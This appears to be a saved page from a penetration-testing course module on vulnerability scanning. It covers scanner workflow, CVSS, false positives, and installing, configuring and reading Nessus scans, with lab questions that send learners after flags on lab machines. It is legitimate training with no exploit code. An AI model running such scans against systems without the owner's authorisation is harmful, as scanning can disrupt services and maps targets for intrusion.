PEN-200: 7. Vulnerability Scanning
Bilingual snapshot of https://portal.offsec.com/courses/pen-200-44065/learning/vulnerability-scanning-48659/vulnerability-... saved 2024-07-21.

In this Learning Module, we will cover the following Learning Units:

  • Vulnerability Scanning Theory
  • Vulnerability Scanning with Nessus
  • Vulnerability Scanning with Nmap

The discovery of vulnerabilities is an integral part of any security assessment. The process of identifying the attack surface of a piece of software, system, or network is called Vulnerability Scanning.

Vulnerability scanners come in many different forms, from individual scripts that identify a single vulnerability to complex commercial solutions that scan a broad variety of vulnerabilities. Automated vulnerability scanners can be invaluable for penetration testers as they help quickly establish a baseline on the target network before performing a more thorough manual testing analysis to get adequate coverage. Common types of vulnerability scanners are web application and network vulnerability scanners.

In this Module, we will analyze automated network vulnerability scanning. We'll begin with the theory behind vulnerability scanning and then use Nessus and Nmap to perform different kinds of vulnerability scans.

7.1. Vulnerability Scanning Theory

This Learning Unit covers the following Learning Objectives:

  • Gain a basic understanding of the vulnerability scanning process
  • Learn about the different types of vulnerability scans
  • Understand the considerations of a vulnerability scan

In this Learning Unit, we'll discuss the theory behind vulnerability scanning. Before inspecting our tools, we need to outline the basic workflow of a vulnerability scanner and understand how it finds vulnerabilities. We will also review the different types and considerations of a vulnerability scan.

7.1.1. How Vulnerability Scanners Work

Every vulnerability scanner has its own customized workflow but the basic process behind vulnerability scanning is implementation-independent. The basic process of an automated vulnerability scanner can be described as:

  1. Host discovery
  2. Port scanning
  3. Operating system, service, and version detection
  4. Matching the results to a vulnerability database

Host Discovery tells the scanner if the target is up and responding. The scanner then uses various techniques to identify all open ports on the system and detect all remotely accessible services with corresponding versions. In addition, operating system detection will be done in this step.

Based on all gathered information, the vulnerability scanner will then query a vulnerability database to match the found data to vulnerabilities. Examples of vulnerability databases are the National Vulnerability Database and the Common Vulnerabilities and Exposures (CVE) program.

Most commercial vulnerability scanners also have the functionality to verify found vulnerabilities by attempting to partially or fully exploit them. This can significantly reduce missed vulnerabilities but can impact the stability of the service or system.

Vulnerabilities are identified by the CVE system. While this allows us to identify and find verified vulnerabilities, the CVE identifier provides no information about the severity of a vulnerability.

The Common Vulnerability Scoring System (CVSS) is a framework for describing the characteristics and severity of vulnerabilities. Each CVE has a CVSS score assigned. The two major versions are CVSS v2 and CVSS v3. Both use a range from 0 to 10 to rate vulnerabilities, with different severity labels. The following figure from the National Institute of Standards and Technology (NIST) lists the base score ranges and associated severities for CVSS v2.0 and CVSS v3.0. (CVSS v4.0 was published in November 2023, but v3.x scores are still what most vulnerability databases and scanners report.)

Figure 1: CVSS Ratings

To obtain a CVSS score, we can review the CVE in a vulnerability database, or if there is no CVE assigned, we can use a CVSS calculator. In 2019, CVSS v3.1 was released, which clarified and improved the existing version.

We need to be aware that the results of a vulnerability scan can be incomplete or contain wrongfully detected vulnerabilities.

A false positive occurs when a vulnerability is detected but the target is not vulnerable. This can happen through a wrong service and version detection or a configuration that makes the target unexploitable. False positives can also occur when patches or updates are backported, meaning that security fixes are applied to an older version of software.

A false negative is the opposite case: the target is vulnerable, but the scanner misses it, for example because service or version detection failed or because no plugin exists for that vulnerability.
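The following added Python example (not PEN-200, Nessus or Nmap code) shows step 4 of the workflow from 7.1.1, matching detected services to a vulnerability database, and makes the backport problem above concrete: a banner-only match is downgraded when the version string carries a distribution package revision, and a service whose version could not be detected is flagged as a possible false negative rather than silently dropped. The identifiers EX-0001 and EX-0002, their version ranges, the banners and the addresses are all constructed for illustration.

```python
"""Step 4 of the scanner workflow (matching detected services to a
vulnerability database) with the backport caveat from the false-positive
discussion.

Added example for this section; not PEN-200, Nessus or Nmap code. The
identifiers EX-0001/EX-0002, their version ranges, the banners and the
addresses below are constructed for illustration only.
"""
import re
from dataclasses import dataclass


@dataclass
class Service:
    host: str
    port: int
    product: str
    version: str   # as taken from the banner; "" when detection failed


@dataclass
class VulnEntry:
    vuln_id: str
    product: str
    first_affected: str   # inclusive lower bound
    fixed_in: str         # exclusive upper bound (upstream fix)
    cvss: float


@dataclass
class Finding:
    host: str
    port: int
    vuln_id: str
    cvss: float
    confidence: str   # "likely" | "possible-backport" | "unknown-version"
    note: str


# Distribution package revisions usually mean fixes were backported
# without the upstream version in the banner changing.
DISTRO_REVISION = re.compile(r"(debian|ubuntu|\+deb\d+u\d+|\.el\d+|\.fc\d+)", re.I)


def version_key(version: str) -> list:
    """Make version strings comparable: '7.10' > '7.9' and '7.9p1' > '7.9'.
    Numbers become (1, int), letters (0, str), so an int never meets a str."""
    parts = re.findall(r"\d+|[A-Za-z]+", version)
    return [(1, int(p)) if p.isdigit() else (0, p.lower()) for p in parts]


def split_banner_version(version: str) -> tuple:
    """'7.9p1 Debian-10+deb10u2' -> ('7.9p1', True): upstream version and
    whether a distribution package revision is present."""
    upstream = version.split()[0] if version.strip() else ""
    return upstream, bool(DISTRO_REVISION.search(version))


def in_affected_range(version: str, entry: VulnEntry) -> bool:
    key = version_key(version)
    return version_key(entry.first_affected) <= key < version_key(entry.fixed_in)


def match_services(services: list, database: list) -> list:
    """Unauthenticated, banner-based matching, as a scanner does it."""
    findings = []
    for svc in services:
        if not svc.version.strip():
            # Nothing to match on: a version-based plugin cannot fire here.
            findings.append(Finding(svc.host, svc.port, "-", 0.0, "unknown-version",
                                    f"{svc.product} version not detected; possible false negative"))
            continue
        upstream, backported = split_banner_version(svc.version)
        for entry in database:
            if entry.product != svc.product or not in_affected_range(upstream, entry):
                continue
            if backported:
                findings.append(Finding(svc.host, svc.port, entry.vuln_id, entry.cvss,
                                        "possible-backport",
                                        "distro package may carry the fix; confirm with an authenticated scan"))
            else:
                findings.append(Finding(svc.host, svc.port, entry.vuln_id, entry.cvss,
                                        "likely", "upstream version inside the affected range"))
    return findings


def count_by_confidence(findings: list) -> dict:
    counts = {}
    for f in findings:
        counts[f.confidence] = counts.get(f.confidence, 0) + 1
    return counts


# Constructed scanner output (steps 1-3 of the workflow already done).
SERVICES = [
    Service("192.168.50.10", 22, "OpenSSH", "7.9p1 Debian-10+deb10u2"),  # backported
    Service("192.168.50.11", 22, "OpenSSH", "7.4"),                       # in range
    Service("192.168.50.12", 80, "Apache httpd", "2.4.15"),               # in range
    Service("192.168.50.13", 80, "Apache httpd", ""),                     # no version
    Service("192.168.50.14", 22, "OpenSSH", "9.6"),                       # fixed
]

# Constructed vulnerability database; IDs and ranges are hypothetical.
VULN_DB = [
    VulnEntry("EX-0001", "OpenSSH", "6.2", "8.0", 7.8),
    VulnEntry("EX-0002", "Apache httpd", "2.4.10", "2.4.20", 9.8),
]


if __name__ == "__main__":
    for f in match_services(SERVICES, VULN_DB):
        print(f"{f.host}:{f.port} {f.vuln_id} cvss={f.cvss} [{f.confidence}] {f.note}")
```

The three confidence levels are the point: the "likely" hits are what a scanner reports, the "possible-backport" hit is the classic false positive that an authenticated scan (next Learning Unit) resolves by checking the installed package, and the "unknown-version" entry is the place a false negative hides when only the vulnerability list is read.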

In a penetration test, we often need to find the right balance between manual and automated vulnerability scanning. Let's explore both options briefly.

A manual vulnerability scan will inevitably be very resource-intensive and time-consuming. When there is a huge amount of data to analyze, we often reach our cognitive limit quickly and overlook vital details. On the other hand, manual vulnerability scanning allows for the discovery of complex and logical vulnerabilities that are rather difficult to discover using any type of automated scanner.

Automated vulnerability scans are invaluable when working on engagements for a multitude of reasons. First, in nearly all types of assessments, we have time constraints. Therefore, when we have a big enterprise network to scan, we cannot manually review every system. This is especially true when thinking about new or complex vulnerabilities. Second, by using automated scanners, we can quickly identify easily-detected vulnerabilities and other low-hanging fruit.

We should take the time to explore the inner workings of every automated tool we plan to use in a security assessment. This will not only assist us in configuring the tool and digesting the results properly, but doing that will help us understand the limitations that must be overcome with manually applied expertise.

Labs

  1. Is this a false positive or a false negative? A vulnerability scanner identifies a vulnerability for a Linux web server. The target runs on Windows and the vulnerability is only exploitable on Linux.
  2. Is this a false positive or a false negative? A vulnerability scanner detects the wrong version of an FTP service. The detected version has no vulnerabilities, but the running FTP service is vulnerable.

7.1.2. Types of Vulnerability Scans

In this section, we will examine internal and external as well as unauthenticated and authenticated vulnerability scans.

The location where we perform the vulnerability scan determines the target visibility. If a client tasks us with an external vulnerability scan, they mean to analyze one or more systems that are accessible from the internet. Targets in an external vulnerability scan are often web applications, systems in the demilitarized zone(DMZ), and public-facing services.

The client intends to get an overview of the security status of all systems that are accessible by an external attacker. In most cases, we get a list of IP addresses the client wants us to scan but occasionally, they want us to map all external accessible systems and services by ourselves. While a company should always know which of their systems are publicly accessible, it's not always the case. As a result, we will often find externally exposed sensitive systems and services that the company is not aware of.

On the other hand, there is the internal vulnerability scan where we have direct access to either a part of or the complete internal network of a client. When a client tasks us with this kind of vulnerability scan, we either get VPN access or perform the scan on-site. The intention is to get an overview of the security status of the internal network. It is important to analyze which vectors an attacker can use after breaching the perimeter.

The next two scan types we will examine are authenticated and unauthenticated vulnerability scans. When we perform a vulnerability scan on a system without providing credentials, it is called an unauthenticated vulnerability scan. Unauthenticated scans are made to find vulnerabilities in remotely accessible services on a target. Therefore, they map the system with all open ports and provide us with an attack surface by matching the information to vulnerability databases as mentioned before.

However, we get no information about local security flaws, such as missing patches, outdated software, or configuration vulnerabilities on the system itself. For example, in an unauthenticated vulnerability scan on a Windows target, we cannot determine if the system is patched against the HiveNightmare vulnerability, which allows an unprivileged user to read sensitive system files. This is where authenticated scans come into play.

Most scanners can be configured to run authenticated scans, in which the scanner logs in to the target with a set of valid credentials. In most instances, authenticated scans use a privileged user account to have the best visibility into the target system. The goal of authenticated vulnerability scans is to check for vulnerable packages, missing patches, or configuration vulnerabilities.

We will perform both authenticated and unauthenticated scans in the next Learning Unit, but first, let's discuss how to obtain accurate and conclusive results.

Labs

  1. Do you need to perform an authenticated or an unauthenticated vulnerability scan in the following scenario? You want to determine if all current patches on a Linux system are installed.
  2. Do you need to perform an authenticated or an unauthenticated vulnerability scan in the following scenario? You want to analyze the perimeter of a server on the internet from the perspective of a malicious actor.

7.1.3. Things to consider in a Vulnerability Scan

In this section, we will cover a few things we need to consider when planning and performing a vulnerability scan. In large engagements, we need to configure the vulnerability scanner carefully to get meaningful and relevant results.

The first consideration we'll discuss is the scanning duration. Depending on the scanning type and number of targets, the duration of an automated scan can vary greatly. Because external scans over the internet can be time-consuming due to the number of hops and intermediate systems on the network route, we must plan accordingly if we have a large list of IP addresses.

We also need to discuss target visibility. While it is easy to input an IP address and start the vulnerability scan, we often have to properly consider our targets. It's important to determine if our targets are accessible without the need for any VPNs or permissions in a firewall. In most cases, a client providing a list of IP addresses for an external scan isn't a cause for concern. But if we are single-handedly determining the attack surface of a client's publicly accessible infrastructure, we need to understand that firewalls and other access restriction mechanisms, which could make systems and services inaccessible, might be in place.

For example, an international client has several systems in multiple countries. They restrict access from all IP addresses outside of the country where each system is located. From our location, we are only able to access the systems located in our country while all others are inaccessible to us.

Let's also consider target visibility in an internal engagement. We need to think about our positioning in the network to get meaningful results, especially when we want to scan systems from other subnets. Keep in mind that firewalls, intrusion prevention systems (IPS), and intermediate network devices (such as routers), can filter or alter our traffic. One example of this is when a vulnerability scanner sends ICMP packets in the Host Discovery step and the intermediate device does not forward them. Hence, the scanner marks the target as offline.

In addition, our scan can be affected by rate limiting, which is used to limit the amount of traffic on a network. When our scan exceeds thresholds such as throughput, packet count, or connection count, the source system of our vulnerability scan may be throttled or temporarily blocked. When the host discovery and service detection probes are rate-limited and therefore slowed down, the vulnerability scanner may miss live hosts or services. Most vulnerability scanners can address this by specifying delays and timeouts and by limiting parallel connections.

Finally, let's review the network and system impact of vulnerability scans. A vulnerability scanner produces a lot of network traffic in most configurations, especially if we want to scan multiple targets in a parallel way. This can easily render a network unusable. To address this, we could reduce the number of parallel scans or the scanning speed. An even bigger problem is the potential impact of our vulnerability scan on the stability of a system. We need to consider that every vulnerability scan can bring instability to any system or service we scan.

Labs

  1. Is the following statement true or false? A vulnerability scan can never impact the stability of a target system or service.
  2. Is the following statement true or false? Rate limiting can be the reason that a vulnerability scanner can flag a live target system as offline.

7.2. Vulnerability Scanning with Nessus

This Learning Unit covers the following Learning Objectives:

  • Install Nessus
  • Understand the different Nessus components
  • Configure and perform a vulnerability scan
  • Understand and work with the results of a vulnerability scan with Nessus
  • Provide credentials to perform an authenticated vulnerability scan
  • Gain a basic understanding of Nessus plugins

In this Learning Unit, we'll focus on Nessus, which is one of the most popular vulnerability scanners, containing over 67000 CVEs and 168000 plugins.

Nessus is available as Nessus Essentials and Nessus Professional. We will use the free version, Nessus Essentials, which comes with some restrictions and constraints. For example, we can only scan 16 different IP addresses, and some templates and functions are not available. However, Nessus Essentials will give us insight into how to use the full commercial version and the general concepts discussed in this section will also apply to most commercial scanners.

7.2.1. Installing Nessus

For this Learning Unit, we'll need to install Nessus on the Kali Linux VM, which is used to connect to the PEN-200 lab environment. An internet connection and a business email address will be necessary to download and activate Nessus. The minimum hardware requirements Tenable recommends are 4 CPU cores and 8GB of RAM. However, we don't need to meet those requirements for our exercises. 2 CPU cores and 4GB of RAM are sufficient for our needs.

Nessus is not available in the Kali repositories and needs to be installed manually. We can download the current version of Nessus as a 64-bit .deb file for Kali from the Tenable website. There, we also get the SHA256 and MD5 checksums for the installer.

Learners using an Apple system with an ARM-based chip can install Nessus on a Kali VM by downloading the installer for the Linux - Ubuntu - aarch64 platform.

Let's select Linux - Debian - amd64 as the platform and download the installer.

Figure 2: Download Nessus for Kali

After downloading the installer, we'll check the SHA256 checksum to validate it. To do this, we click the Checksum button and copy the SHA256 checksum to the clipboard via the copy icon.

We then echo the copied checksum together with the filename of the installer into a file with the name sha256sum_nessus. Since the button next to the SHA256 checksum only copies the checksum itself, we need to enter the file name manually. The resulting sha256sum_nessus file needs to be in the same directory as the Nessus installer. We will then use sha256sum with the -c parameter to verify the checksum.

kali@kali:~$ cd ~/Downloads

kali@kali:~/Downloads$ echo "4987776fef98bb2a72515abc0529e90572778b1d7aeeb1939179ff1f4de1440d Nessus-10.5.0-debian10_amd64.deb" > sha256sum_nessus

kali@kali:~/Downloads$ sha256sum -c sha256sum_nessus
Nessus-10.5.0-debian10_amd64.deb: OK

Listing 1 - Verifying the checksum

The output shows that the checksums match, which means we can install the package. If there is a newer version of Nessus, the checksum from the previous listing will differ and needs to be adapted. Keep in mind that a checksum published on the same site as the download only protects against a corrupted or truncated download; it cannot prove the package is genuine if that site itself has been compromised.

To install the Nessus package, we'll use apt with the install option.

kali@kali:~/Downloads$ sudo apt install ./Nessus-10.5.0-debian10_amd64.deb
...
Preparing to unpack .../Nessus-10.5.0-debian10_amd64.deb ...
Unpacking nessus (10.5.0) ...
Setting up nessus (10.5.0) ...
...
Unpacking Nessus Scanner Core Components...
 - You can start Nessus Scanner by typing /bin/systemctl start nessusd.service
 - Then go to https://kali:8834/ to configure your scanner

Listing 2 - x64 Nessus installation

After the installation is complete, we can start the nessusd service via systemctl.

kali@kali:~/Downloads$ sudo systemctl start nessusd.service

Listing 3 - Starting Nessus

Once Nessus is running, we can launch a browser and navigate to https://127.0.0.1:8834. We will be presented with a warning indicating an unknown certificate issuer, which is expected due to the use of a self-signed certificate. To accept and trust the self-signed certificate, we can click on Advanced... and then Accept the Risk and Continue.

Figure 3: Nessus Presenting a Certificate Warning

After the page loads, we are prompted to configure pre-installation settings. Let's click on Continue to start the installation with the default settings.

Figure 4: Configuring Pre-Installation Settings

Now, we can select a Nessus product. For this Learning Unit, we'll choose Register for Nessus Essentials and click Continue.

Figure 4: Selecting Nessus Essentials

Next, we are prompted to request an activation code for Nessus Essentials. We'll provide the required information and click Register.

Figure 5: Requesting an Activation Code

Once we have registered, the activation code is shown in the next window.

Figure 6: Activating Nessus

Next, we'll create a local Nessus user account. We'll choose the username admin with a strong password to protect our vulnerability scan results. We'll use these credentials to log in to the Nessus application.

Figure 7: Creating a Local Nessus Account

Finally, Nessus downloads and compiles all plugins. This can take a significant amount of time to complete.

Figure 8: Downloading Nessus Plugins

After the plugins are downloaded and installed, we have a working instance of Nessus Essentials.

Labs

  1. Follow the steps above to install Nessus Essentials. What is the command to start the nessusd service after a successful installation from an unprivileged account?

7.2.2. Nessus Components

Before we start our first vulnerability scan with Nessus, we'll take some time to get familiar with the core components. When we log in for the first time, we find a welcome window that allows us to enter targets. We can close it without entering anything for now.

First, let's investigate the tabs in the Nessus dashboard. In the Essentials version of Nessus, we have two tabs called Scans and Settings.

Figure 9: Exploring Nessus Settings

The Settings tab allows us to configure the application. For example, we can enter information for an SMTP server to get scan results via email. The advanced menu allows us to configure global settings ranging from user interface, scan, and log behavior, to security and performance-related options.

As shown in Figure 9, the About menu lists basic information for Nessus, our license, and how many hosts we have left. For further information on how we can customize and configure Nessus, we can consult the Nessus documentation.

Next, let's examine policies and templates by clicking on the Scans tab and then Policies. A policy is a set of predefined configuration options in the context of a Nessus scan. Once saved, a policy can be used as a template for new scans.

Let's now click on Scan Templates. Nessus already provides a broad variety of scanning templates for us to use. These templates are grouped into the three categories Discovery, Vulnerabilities, and Compliance.

Figure 10: Nessus Policy Templates

The Compliance category, as well as the Mobile Device Scan template, is only available in the enterprise version. The only template in the Discovery category is Host Discovery, which can be used to create a list of live hosts and their open ports.

The Vulnerabilities category consists of templates for critical vulnerabilities or vulnerability groups e.g. PrintNightmare or Zerologon as well as templates for common scanning areas e.g. Web Application Tests or Malware Scans.

Nessus also provides three general vulnerability scanning templates:

  1. The Basic Network Scan performs a full scan with the majority of settings predefined. It detects a broad variety of vulnerabilities and is therefore the template Nessus recommends. We can still customize these predefined settings.

  2. The Advanced Scan is a template without any predefined settings. We use it when we want to fully customize our vulnerability scan or have specific needs.

  3. The Advanced Dynamic Scan also comes without any predefined settings or recommendations.

The biggest difference between the last two templates is that in the Advanced Dynamic Scan, we don't select plugins manually; instead, the template lets us configure a dynamic plugin filter that selects the matching plugins for us.

Nessus Plugins are programs written in the Nessus Attack Scripting Language (NASL) that contain the information and the algorithm to detect vulnerabilities. Each plugin is assigned to a plugin family, which covers different use cases. We will work with the Advanced Dynamic Scan template and plugins in the last section of this Learning Unit.

Labs

  1. What is the third group of template categories: DISCOVERY, COMPLIANCE and __________?
  2. Go to the Settings tab in Nessus then click on the Advanced settings. Find how many concurrent web users are allowed with the default settings.

7.2.3. Performing a Vulnerability Scan

In this section, we will perform our first vulnerability scan. To begin, let's click on the New Scan button on the dashboard in the Scans tab.

Figure 11: Creating a Scan

Nessus provides a list of the different templates. For this section, we will use the Basic Network Scan, which we can launch by clicking on it.

Figure 12: Selecting a Basic Network Scan

This will present the scan configuration settings screen containing the BASIC, DISCOVERY, ASSESSMENT, REPORT, and ADVANCED settings.

Figure 13: Different Settings in Scan Configuration

The default screen is the General settings page with the two required arguments: a name for our scan and a list of targets. Nessus accepts several target formats: a single IP address, an IP range, a Fully-Qualified Domain Name (FQDN), or a comma-delimited list of addresses and names.

For this example, we will scan the following machines: POULTRY, JENKINS, WK01, and SAMBA. We will enter "Basic Vulnerability Scan" into the Name field and the IP addresses of the machines into the Targets field.

Figure 14: Configuring Scan Name and Target List

Since we chose the Basic Network Scan template, Nessus has already configured most of the settings for us. However, the default configuration might not be exactly what we need. Depending on the scanning type, the environment, time constraints, and the targets, we may need to adapt the settings to fit our needs.

In the default settings of this template, Nessus scans a list of common ports. For this demonstration, we only want to scan ports 80 and 443. To do this, let's click on the Discovery settings and select Custom in the dropdown menu.

Figure 15: Selecting Custom Discovery Settings

The dropdown menu shown in Figure 15 provides us with several predefined options. To scan specific ports, we'll need to select Custom.

After we click on Custom, additional configuration menus appear under the DISCOVERY menu. We can now customize the Basic Network Scan template in the same way as the Advanced Scan template in the context of the DISCOVERY menu. Within the Port Scanning section, we will set the Port scan range to "80,443". Additionally, we'll enable the Consider unscanned ports as closed option so that Nessus treats all other ports as closed, since we are only interested in ports 80 and 443.

Figure 16: Specifying Ports 80 and 443

In this demonstration, we've customized the Basic Network Scan template to only scan two specific TCP ports. But even in the default settings of this template, Nessus does not scan UDP ports. If we want to activate UDP port scanning, we need to configure it manually. If it stays disabled during an assessment, we may miss crucial information about UDP services, but we need to understand that activating UDP port scanning will vastly increase the scan duration. Due to the nature of UDP, it is often not possible to tell the difference between an open and a filtered port.

To save time and scan the targets more quietly, we will turn off Host Discovery because we know the hosts are available. We do this by navigating to Discovery > Host Discovery where we toggle Ping the remote host to Off.

Figure 17: Disable Host Ping in Discovery Settings

During the configuration of the scan definition, we did not configure any credentials, which implies that this scan will run unauthenticated.

We also didn't change the default settings of the ASSESSMENT menu in the Basic Network Scan template. This means that no brute forcing of user credentials will be done. Even though brute forcing is disabled, our scan creates a lot of network traffic and, because we're scanning multiple hosts, will be highly noticeable.

Now that we have a basic understanding of how we can customize templates to fit our needs, we can launch our first scan. We can do this by clicking on the arrow next to Save and selecting Launch.

Figure 18: Launching the Scan

Initially, the scan will have a status of Running in the Nessus dashboard under My Scans.

Figure 19: Running Scan in the Nessus Dashboard

Figure 19 shows the running scan and provides the options to stop or pause it. Once the scan is finished, the status will change to Completed.

Figure 20: Completed Scan in the Nessus Dashboard

This concludes our first vulnerability scan with Nessus. In the next Learning Unit, we'll examine the results of the scan.

Resources

Some of the labs require you to start the target machine(s) below.

Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text and video.

Vulnerability Scanning - Performing a Vulnerability Scan - VM Group 1

Labs

  1. Follow the steps above to create your own unauthenticated vulnerability scan on ports 80 and 443 on the machines from VM Group
  2. Review the REPORT menu of the scan configuration, which is shown in Figure 13 and check what is the only enabled option in the Output section. Enter the name of the activated checkbox.

7.2.4. Analyzing the Results

In this section, we will analyze the results of our first vulnerability scan.

Warning

The VM group required for this section is different than the previous VM group. Please make sure to start and use the VM group at the bottom of this section.

Due to the continuous updates of Nessus and its plugins, the scan results can differ slightly. We can click on the scan in the My Scans list to get to the results dashboard.

Figure 21: Result Dashboard

The initial view displays the Hosts page, which lists all scanned hosts and provides a visual representation of the vulnerability data. This allows us to identify important findings in one glance and gives us an overview of the security status of each system. On the bottom right, Nessus displays a visual representation of the distribution of all targets' vulnerability information. Above it, we can find general information about the vulnerability scan.

Nessus plugins are frequently updated. Therefore, the findings, groupings, and information presented in this Learning Unit may differ slightly from the results of your vulnerability scans.

To get the list of findings from a specific host, we can click on a list entry. This shows us the list of vulnerabilities from the selected host. Let's click on the entry for 192.168.50.124.

Figure 22: Vulnerability Result Dashboard of 192.168.50.124

The Severity column gives us a quick indicator if this is a critical finding or not. Figure 22 also shows us that there are three findings with the MIXED severity. Nessus uses this severity when it groups findings. The Count column shows us how many findings the corresponding group contains. We can click on a grouped finding to display a list of all findings in this group. Let's click on Apache Httpd (Multiple Issues), which is listed as Web Servers under the Family column.

Figure 23: List of Grouped Findings

Figure 23 shows us information on the findings, which were previously grouped. We can get more information by clicking on a finding. Let's click on Apache 2.4.49 < 2.4.51 Path Traversal Vulnerability.

Figure 24: Detailed Information of a Finding

Each finding contains a huge amount of information about the vulnerability itself, as well as the plugin that detected it. Furthermore, we get a lot of information about the associated risk, status of exploits, and other references.

Next, let's navigate back to the results dashboard shown in Figure 21 to explore our scan further.

Analyzing the findings of a single target provides us with a lot of detailed information. However, we often want to get an overview of the most important vulnerabilities of all targets. To achieve this, Nessus provides a handy feature to get a prioritized overview of vulnerabilities named VPR Top Threats, which utilizes the Vulnerability Priority Rating (VPR). The findings in the VPR list consist of the top ten vulnerabilities of the scan.

Figure 25: VPR List of Vulnerabilities

In our example, the list only contains six vulnerabilities as Nessus didn't find more with our configuration.

Depending on the version of Nessus, the tab VPR Top Threats may be missing while following along. However, each vulnerability finding still contains the Vulnerability Priority Rating.

The next page we'll examine is Remediations. If Nessus detects a vulnerability, the plugins often contain a remediation strategy or information on how to mitigate the vulnerability. In the case of the Apache vulnerabilities from Figure 22, we get the following information.

Figure 26: Remediation of Vulnerabilities

The last report page is History. This page lists all vulnerability scans with this configuration. We can use it to review or compare the results of previous scans.

We now have an understanding of how to view the results of a Nessus scan. Next, let's create a PDF report of our vulnerability scan. We can do this by using the functions in the Report dashboard. Apart from the creation of a report, the functions also cover the change of the scan configuration, the launch of another scan, or exporting data. We can also configure an Audit Trail, which allows us to analyze why a specific plugin behaved in a certain way. It can be used to reduce the number of false negatives.

Let's create a PDF report for our first vulnerability scan by clicking Report.

Figure 27: Create a Report

Once we click on the button, a new window allows us to use different report templates. Each template generates a report with a different structure, focus, and content.

For this example, we'll use the Detailed Vulnerabilities By Host template, which presents detailed findings grouped by each host. We'll then select PDF as the format and click Generate Report.

Figure 28: Select the Report Format and Template

After this, we can download or open the PDF report.

We could also use the Complete List of Vulnerabilities by Host template to create a summary of the vulnerabilities instead of including detailed information.

For more information on how to customize the reports, consult the scan exports and reports section of the Tenable Documentation (https://docs.tenable.com/nessus/Content/ScanReportFormats.htm) page.

In the last two sections, we performed a vulnerability scan, reviewed the results, and generated a PDF report with detailed information for all hosts. We can get more familiar with Nessus by customizing the scan configurations and analyzing how the scanning behavior and results differ.


Resources

Some of the labs require you to start the target machine(s) below.

Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text and video.

Vulnerability Scanning - Performing a Vulnerability Scan - VM #5
Vulnerability Scanning - Analyzing the Results - VM Group 1

Labs

  1. In the section "Performing a Vulnerability Scan" we launched a vulnerability scan on four target machines. Follow the steps outlined in this section to review the results of this scan and analyze the Apache 2.4.49 < 2.4.51 Path Traversal Vulnerability finding. The finding contains a field named Exploit Code Maturity. Enter the value of this field as an answer to this exercise.
  2. Perform an unauthenticated vulnerability scan on the same four machines (VM Group 1) as in the previous exercise, but only scan port 8080. Once the scan finishes, review the scan results and identify a host with the grouped finding HTTP (Multiple Issues). Find HTTP Server Type and Version and enter the Jetty version found.
  3. Nessus can build a Sitemap of a target web server. A Sitemap provides information about the content of a web server (e.g. pages). Nessus builds it by crawling through links it identifies on pages. Scan the four target machines (VM Group 1) on port 9999 with the Basic Network Scan template. To configure Nessus to build a Sitemap, click on the Assessment settings in the scan configuration and select Custom in the dropdown menu. Next, click on Web Applications and activate Scan web applications. After this, launch the scan. Once it is finished, review the results and analyze the findings on the Web Application Sitemap. The output provides a list of found pages. On one of these pages, you will find the flag.
  4. The victim machine VM #5 is running a server that contains several vulnerabilities. One vulnerability allows for directory traversal and arbitrary file access on the target system. Use Nessus to perform a Basic Network Scan of the victim. Make sure to configure the scan to assess all ports. Once the scan is completed, examine the discovered vulnerability in the results. As a part of the scan, Nessus was able to read the file C:\Windows\win.ini as a proof of concept of this exploit. Expand the vulnerability results to view the full content of the retrieved file and locate the embedded flag.

7.2.5. Performing an Authenticated Vulnerability Scan

In this section, we will perform an authenticated vulnerability scan by providing credentials to Nessus. As we discussed previously, authenticated scans produce more detailed information and reduce the number of false positives. To demonstrate this, we will use an authenticated vulnerability scan against the target DESKTOP.

We need to consider that an authenticated scan not only creates a lot of traffic on the network but also a huge amount of noise on the system itself, such as log entries and AV notifications.

To begin, we'll click New Scan on the Nessus dashboard.

Figure 29: Creating a new Scan

Even though all Nessus templates accept user credentials, we'll use the Credentialed Patch Audit scan template, which comes preconfigured to execute local security checks against the target.

The difference between this and the Basic Network Scan template with provided credentials is that the Credentialed Patch Audit scan only uses local security checks and will not do a regular vulnerability check from an external perspective. The Credentialed Patch Audit template will not only scan for missing operating system patches but also for outdated applications, which may be vulnerable to privilege escalation attacks.

Figure 30: Select Credentialed Patch Audit

Once again, we will provide a name for the scan and set the target to DESKTOP.

Figure 31: Basic Settings for the Authenticated Scan

Next, let's click on the Credentials tab and select SSH in the Host category. On the Authentication method dropdown, we'll select password, and enter "offsec" as the username and "lab" as the password. We'll select sudo for the Elevate privileges with option and enter "root" as the sudo user and "lab" as the password.

Figure 32: SSH and Sudo Credentials for the Authenticated Scan

While we will use the SSH configuration for this example, there are several other authentication mechanisms available. To get a list of all available mechanisms, we can click the Categories dropdown menu and select All. We can consult the Tenable Documentation for a complete list of supported authentication mechanisms.

For Linux and macOS targets, SSH is used. While we can also use SSH on Windows, in most cases, we will use Server Message Block (SMB) and Windows Management Instrumentation (WMI) to perform authenticated vulnerability scans against Windows targets. Both methods allow us to use local or domain accounts and different authentication options.

To get meaningful results in an authenticated vulnerability scan, we need to ensure that our target system is configured correctly. Depending on the authentication method we want to use, we need to make sure that there is no firewall blocking connections from our scanner. Furthermore, we often find antivirus (AV) programs installed on both Linux and Windows targets. AV may flag the vulnerability scan as malicious and therefore, terminate our connection or render the results useless. Depending on the AV program, we can add an exception for the authenticated scan or temporarily disable it.

Another Windows security technology we need to consider is User Account Control (UAC). UAC is a security feature for Windows that allows users to use standard privileges instead of administrator privileges. An administrative user will run most applications and commands with standard privileges and receive administrator privileges only when needed.

Due to the nature of UAC, it can also interfere with our scan. We can configure UAC to allow Nessus or temporarily disable it. We should consult the Tenable Documentation, especially for Windows targets before we start our first authenticated scan.

Our scan target is a Linux system without AV. Therefore, we can click the arrow next to Save and launch the scan. After the scan has finished, we can review the results. On the Vulnerabilities page, we get a list of the findings for the authenticated scan. In the last section, we had already grouped findings with the MIXED severity. For our authenticated scan, let's disable the grouping of findings by clicking on the wheel and selecting Disable Groups.

Figure 33: Disable Grouped Results

After we disable groups, each finding is listed separately.

Figure 34: Authenticated Scan Results

We get a list of vulnerabilities for Ubuntu, all of which belong to the Ubuntu Local Security Checks plugin family.

Plugins grouped into plugin families check for vulnerabilities in the same context. For example, there are separate plugin families for checking vulnerabilities in databases, firewalls, or web servers. The Ubuntu Local Security Checks plugin family contains a multitude of plugins that check for local vulnerabilities and missing patches for Ubuntu.

The Name column provides us with the vulnerable Ubuntu versions and a brief description as well as the patch number for the vulnerabilities.

Figure 35: Vulnerability data of Firefox and curl

The list also contains vulnerability data of locally exposed applications such as Firefox or cURL.

Resources

Some of the labs require you to start the target machine(s) below.

